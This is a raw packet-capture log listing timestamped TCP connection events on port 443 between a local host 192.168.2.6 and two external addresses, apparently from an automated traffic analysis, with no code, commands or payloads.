                                                        Nov 12, 2024 16:27:30.580452919 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.580487013 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.581068039 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.581074953 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.711539984 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.711616993 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.711700916 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.711991072 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.712014914 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.712030888 CET49902443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.712037086 CET4434990213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.715764046 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.715826035 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.715995073 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.716048002 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.716059923 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.755186081 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.756803989 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.756815910 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.758887053 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.758893013 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.885018110 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.885701895 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.885843992 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.886034966 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.886050940 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.886064053 CET49903443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.886071920 CET4434990313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.895014048 CET49906443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.895045996 CET4434990613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:30.895132065 CET49906443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.895385027 CET49906443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:30.895401001 CET4434990613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.151447058 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.152587891 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.152595997 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.154603004 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.154608011 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.284657955 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.284682989 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.284727097 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.284745932 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.284796953 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.285450935 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.285464048 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.285479069 CET49904443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.285484076 CET4434990413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.293008089 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.293081045 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.293143034 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.294177055 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.294203997 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.449003935 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.455884933 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.455929995 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.456681967 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.456701040 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.582252979 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.582325935 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.582381964 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.582901001 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.582921982 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.582932949 CET49905443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.582938910 CET4434990513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.589359045 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.589391947 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:31.589442968 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.591198921 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:31.591209888 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.034809113 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.035370111 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.035402060 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.035876036 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.035886049 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.165990114 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.166048050 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.166161060 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.166487932 CET49907443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.166506052 CET4434990713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.170912027 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.170954943 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.171072006 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.171330929 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.171345949 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.354537010 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.355057955 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.355076075 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.355671883 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.355675936 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.488481998 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.488501072 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.488548994 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.488569975 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.488610983 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.488888025 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.488903999 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.488914013 CET49908443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.488919973 CET4434990813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.492136002 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.492160082 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.492393017 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.492595911 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.492608070 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.920429945 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.921480894 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.921480894 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:32.921510935 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:32.921531916 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.054568052 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.055253029 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.055305004 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.055341005 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.055372000 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.055444956 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.055444956 CET49909443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.055461884 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.055473089 CET4434990913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.058590889 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.058613062 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.058772087 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.058912039 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.058926105 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.248239994 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.249263048 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.249263048 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.249275923 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.249284983 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.380526066 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.381108999 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.381155968 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.381227016 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.381345034 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.381345034 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.381414890 CET49910443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.381432056 CET4434991013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.384275913 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.384335995 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.384574890 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.384574890 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.384608984 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.818233013 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.818783998 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.818816900 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.819277048 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.819283009 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.952667952 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.952732086 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.952996969 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.953085899 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.953109980 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.953126907 CET49911443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.953131914 CET4434991113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.956252098 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.956304073 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:33.956372976 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.956527948 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:33.956542015 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.154850006 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.155391932 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.155426979 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.155944109 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.155947924 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.285823107 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.286474943 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.286519051 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.286523104 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.286562920 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.286623001 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.286649942 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.286662102 CET49912443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.286668062 CET4434991213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.289674997 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.289693117 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.289757013 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.289922953 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.289937019 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.747657061 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.748806953 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.748807907 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.748857975 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.748867989 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.887859106 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.888480902 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.888633966 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.888634920 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.888750076 CET49913443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.888772011 CET4434991313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.891582012 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.891618013 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:34.891864061 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.891897917 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:34.891905069 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.032526016 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.033565998 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.033565998 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.033598900 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.033618927 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.164454937 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.164484978 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.164706945 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.164732933 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.164948940 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.164953947 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.164980888 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.165142059 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.165174961 CET4434991413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.165369987 CET49914443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.174011946 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.174051046 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.174264908 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.174509048 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.174520969 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.630450964 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.631439924 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.631479979 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.632354975 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.632369995 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.761049986 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.761681080 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.761723042 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.761739016 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.761773109 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.761923075 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.761945963 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.761979103 CET49915443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.761985064 CET4434991513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.765647888 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.765690088 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.765846968 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.766076088 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.766093016 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.915163040 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.916277885 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.916294098 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:35.916855097 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:35.916858912 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.046983004 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.047007084 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.047049046 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.047063112 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.047118902 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.047646999 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.047660112 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.047669888 CET49916443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.047677994 CET4434991613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.052922010 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.052939892 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.053034067 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.053533077 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.053541899 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.488816977 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.489341021 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.489368916 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.489871979 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.489876986 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.646847010 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.647792101 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.648013115 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.648102999 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.648133039 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.648149967 CET49917443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.648156881 CET4434991713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.652051926 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.652084112 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.652704954 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.654359102 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.654378891 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.783535004 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.794573069 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.794595003 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.795988083 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.795994043 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.922450066 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.923044920 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.923141003 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.928627968 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.928644896 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.928666115 CET49918443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.928669930 CET4434991813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.939613104 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.939649105 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.939714909 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.940293074 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:36.940304995 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:36.947634935 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:36.947688103 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:36.947748899 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:36.949347019 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:36.949368000 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:37.414820910 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.415429115 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.415465117 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.415960073 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.415963888 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.556180000 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.556770086 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.556816101 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.579675913 CET49919443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.579722881 CET4434991913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.588684082 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.588732958 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.588819027 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.589385986 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.589394093 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.682260990 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.682785988 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.682809114 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.683274984 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.683279991 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.813541889 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.814019918 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.814064026 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.814161062 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.814234018 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.814249039 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.814258099 CET49920443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.814263105 CET4434992013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.817047119 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.817075014 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:37.817325115 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.817492962 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:37.817508936 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.056257010 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.056330919 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.061175108 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.061187983 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.061415911 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.066679001 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.066839933 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.066844940 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.067178965 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.107346058 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.315458059 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.316061974 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.316083908 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.316260099 CET4434992140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:38.316312075 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.316432953 CET49921443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:38.350516081 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.351180077 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.351193905 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.352015972 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.352020025 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.482337952 CET4434992213.107.246.45192.168.2.6
